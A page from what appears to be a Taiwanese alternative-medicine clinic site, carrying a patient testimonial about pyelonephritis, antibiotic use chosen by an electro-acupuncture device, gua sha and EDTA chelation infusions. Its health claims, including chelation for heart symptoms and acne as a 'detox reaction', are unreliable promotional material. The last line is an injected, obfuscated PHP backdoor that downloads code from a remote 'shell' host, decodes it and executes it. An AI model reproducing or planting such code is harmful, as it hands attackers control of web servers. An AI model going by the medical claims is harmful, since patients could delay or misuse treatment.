收藏本站
首頁 arrow 螯療案例 arrow 走出自癒力與抗生素迷思
走出自癒力與抗生素迷思 列印 E-mail
文章索引
走出自癒力與抗生素迷思
頁 2

個案五:楊女士/五十歲 /專案企劃/居住台北

症狀:腎盂炎、持續發燒、肩背脊椎疼痛、虛弱、心悸。

走出自癒力與抗生素迷思

身體狠狠打個大叉

因此「看醫生」這件事鮮少發生在我過去四十幾年的生命中。

不過最近這幾年起了一些變化,我的工
作負荷量是直線攀昇,

精神力氣卻是向下滑落,特別是肩背
脊椎的疼痛,

每每讓我花上半個小時以上才有辦法起床。

愈來愈無法承受增加的工作量,

而我只是漸漸地去習慣身體這樣的情況,

甚至還
天真的認為自己只要可以撐下去,健康自然會有所改善。

不料半夜,我因下腹作痛而醒來,

上廁所時發現尿液帶有血色,雖然感覺有
些不對勁,心想躺回去睡一覺就好了;

結果一夜難眠,第二
天清晨開始高燒不退。

依照往常的經驗,發燒──在家休息幾天就會好,

且我曾聽說一些關於「自體免疫功能」的訊息,很能認同「自然療癒」的觀念,

加上我以前感冒發燒也是躺躺就能痊
癒……。

所以這回發高燒,我仍然躺在床上,靜待它慢慢退
去。

我不要消炎藥!

一天、二天……到了第四天,還是燒,我的呼吸越來越困難,

心跳每分鐘已超過一百多下,不同於過去發燒的情
況,

完全沒有好轉的跡象,而我仍沒意識到需要看醫生。

直到同事、朋友們覺得我那麼多天沒上
班,情況好像不太對勁,

打電話來關心,說不能再任憑高燒
下去,

還威脅我:「再不去看醫生,我們就要來家裡拎妳
去了!」

我才在家人的照顧下就近看診。

經過一般的診療程
序,醫生說是膀胱發炎,引發腎盂炎,

然後交代一些飲食和
多休息之類的注意事項,便開了藥回家。

看著藥袋上的標示,我知道醫生開的是消炎藥,以我對醫藥根深蒂固的觀念:

消炎藥就是抗生素,吃了對身體不
好,會儲存在身體裡面……。

許多濫用抗生素的負面資訊,
讓我不願意接受醫生的指示服藥,

只吃了兩天讓體溫不再
那麼高就不吃了,

但身體仍處於比正常體溫要高的低燒狀態
(三十七點五~三十八度);

不過與之前的高燒相較,似乎
已改善許多,所以就不再吃藥了。

等不到神奇的自癒力就這麼又拖過一個星期,

我還是持續的不舒服,腰、下
腹明顯酸痛,無法起身,

整個人昏昏沈沈卻又無法入睡,加
上呼吸困難、心跳急促……。

可是我不想再看一般的醫生,
我想藉此尋求關於「自癒力」的治療方式,


我想透過「這位醫生」瞭解目前的身體狀
況,

可是我再也沒見到「這位醫生」的面,每次去都是治療
師在「處理」我,

「這位醫生」並沒有對病人有任何持續的
關心與進一步的處方。

大約一個半月後,我對這種「自然療法」失去了耐心,

因為我衰弱的狀況依然存在,頂多治療的當晚睡得好些,

隔天所有的症狀又都冒了出來!「累積那麼久的疾病,

本來
就要慢慢調養」的說法,再也不能說服我。

抱著試試的心態就醫

如此來往,我已拖著病體將近三個月,剛好一位朋友來電、得知我的情況,

便極力推薦我來看看劉醫師。

盛情難
卻,我便抱著試試看的心態跨進診所大門、進了診療室,

前的景象是我從來沒有見過的:瓶瓶罐罐的中藥、西藥幾乎堆滿了桌面,

一台長相奇怪的儀器,和一位沒有白袍、沒有
聽診器,

但眼神專注而敏銳的──劉醫師。


劉醫師用他桌上那台測試儀器的電針

搓著我手指上的
穴點說:「妳現在身體的骨盆腔仍有發炎的現象,必須先控制住,

任其燒下去只會對妳的內臟器官造成嚴重的傷害。」



四十一~
四十二度,但現在三十八點五度的體溫應該還算正常吧?

生卻嚴肅地說:「現在如果不使用足夠與適當的抗生素完全控制腎盂炎,

腎盂炎會反覆復發,最後導致慢性腎盂炎,這
是尿毒的成因之一;

如果變成尿毒,那時妳就要洗腎了!」


劉醫
師又問。其實,我感覺整個人悶悶的,身體虛弱無力,

但我
沒辦法清楚描述,於是我說:「可能是脊椎側彎的影響吧!

每天起床都要花一、二個小時,很痛苦!」

但劉醫師告訴
我,人到一定的年紀難免都會有脊椎側彎的現象,

可是不一
定會發生很難起床的狀況。

他拿起一瓶精油在我的手臂內側
和小腿內側刮痧,非常痛!

然後問我有沒有舒服一點?

我皺
著眉頭誠實以告:「刮痧的疼痛超越了脊椎痛,我沒有辦法感覺。」

是藥?是毒?一試便知

接著劉醫師用電針儀器檢測適合我的藥物,從中發現我身體的發炎現象,

需要且適合我的是一種很舊的抗生素。

再度表明了我不願意吃抗生素,希望用自癒力來改善身體的想法;

但劉醫師告訴我:「人雖然有免疫功能和自癒力,

是沒有把身體的狀況調養到某個程度,免疫功能沒有辦法發揮,

無法用自癒力來改善身體的狀況,所以妳現在需要外力
的輔助。

等調整到免疫系統可以運作時,才不需要抗生素,


而我的藥方合併了中、西醫療方法的概念」,

劉醫師又說:
「我一向不排斥西藥即時而有效的作用,

因為妳的發炎必須
控制住,但是西藥或有殺傷力,

需要中藥來補強,否則身體
容易虛弱、承受不住。」

可能是看出我對抗生素仍有疑慮,劉醫師接著表示:

「有很多種類的抗生素,每個患者所需的抗生素都不一樣,

就妳所測出來的、適合妳的就是這一種,

所以如果拿目前醫
院普遍使用的抗生素給妳『試試看』,試不成再換藥,

麼除了療效不彰外,還會產生妳所擔心對身體造成負擔的狀況。

人體所需的抗生素是可以被分解的,殘留是因為使用
後的時間太短,

因為體內的抗生素最後都會被肝、腎慢慢代
謝、分解、排泄掉。

而不適合的抗生素會造成細菌產生抗藥
性,並增加身體的負擔。」

談了那麼多,劉醫師並沒有忘記我還有脊椎痛的毛病,

他又問我,感覺有沒有好一點?

我動了動,感覺疼痛是有舒
緩些了,可是不舒服的痛點仍隱隱存在。

我暗自心想,精油
和刮痧本來就有「暫時」的效果,

因此劉醫師說什麼我並未
在意,

倒是他對於抗生素的解釋很讓我信服,於是我乖乖地

拿藥回家、按時服用。

藥吃了兩天,不再有發燒的現象了,我整個人開始有鬆開的感覺,

身體、精神各方面狀況都漸漸轉好,人感覺
清爽了許多。

可是第四天又好像有些不太對勁,我跟劉醫
師連絡,他請我儘快去一趟診所。

經過電針儀器檢測,發現
有許多藥我不再需要,且原來的藥量也減少了,

劉醫師說,
從第四天起,原來那些藥的其中某些項目對我而言已經變成「毒」,

便為我重新更改劑量,跟一般「標準化固定劑量開
藥,

開出去的藥就不會再調整」的做法有很大的差異。


更奇妙的是,從第二天開始,早上起床,我竟然可以一碌骨地起身,

脊椎也不痛了!左彎右彎的試了半天,的確
不痛,真是難以置信!

我問劉醫師,為什麼我的脊椎痛塗了
精油就會好?

他說因為我並不是脊椎側彎造成的疼痛,而是
一種「類似」僵直性脊椎炎的疼痛,

用適合的質純精油在對
的經絡進行刮痧,便會立即見效。

總之,直到現在,快一年
了,困擾我多年的脊椎沒再痛過,

而前後只經歷過那次「痛
徹心扉」的刮痧治療而已。

助我回歸正常軌道

膀胱、腎臟、脊椎的問題都獲得改善後,

劉醫師告訴
我,接下來該治療的是我的心血管問題。

因為我常有心悸症
狀,很容易意識到自己的呼吸和心跳,

而正常人是不應該有
這些症狀;我自以為是的想,那應該沒什麼!

既然已經看過
醫生、吃過藥,剩下的就讓它慢慢恢復吧!

便停止了治療。
卻在今年年初,我恢復工作量後,

身體再度瀕臨崩潰的狀
態,這才甘願回去求助劉醫師。

這回,劉醫師告訴我,雖然我自覺已經比以往好太多了,

但仍是是不堪一擊的,這樣並不算是完全康復。

他慎重
地詢問,要我考慮採用「螯合療法」,

並且告訴我這是將
EDTA藥__________劑合併特定的維他命、胺基酸、礦物質…等,

以一
連串靜脈注射方式做治療,將體內有害的重金屬如鉛、鎘、鐵、汞等排出體外,

協助將身體拉回正常軌道,讓它自己運
行的一種療法。

其實我已明顯感受到身體退化的狀態,在那
段期間,

一陣子不見的朋友都驚訝於我的蒼白憔悴。

於是,
我乖乖每週固定進行「螯合治療」,

儘管療程中我長了滿臉
痘痘、粉刺(劉醫師說這是排毒反應,又稱為好轉反應),

但感覺呼吸、心跳逐漸在平穩中,神清氣爽、思緒清晰,有非常顯著的效果,

工作更變得有效率且輕鬆了許多。我持續
耐心的接受治療,

現在我的痘痘不只是完全消失,而且皮膚
也恢復了原來的健康平滑。

以前的我,不知道什麼是「沒有完全好」,沒有發燒、疼痛不就是好了嗎?

也不知道原來還有個讓身體「進入軌
道」的復原階段。

我們對自己的身體真的瞭解太少,也太無
知了!

幸運的是,我並沒有繞太多彎、迷失方向,就接觸到
劉醫師的另類療法,

整合西醫與傳統中醫合併另類醫學的療
法,真的獲益匪淺!

希望提供自身的經驗,減少大家在醫療
上的摸索,

因為,健康無法等待,請大家務必要好好善待自
己的身體!



 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));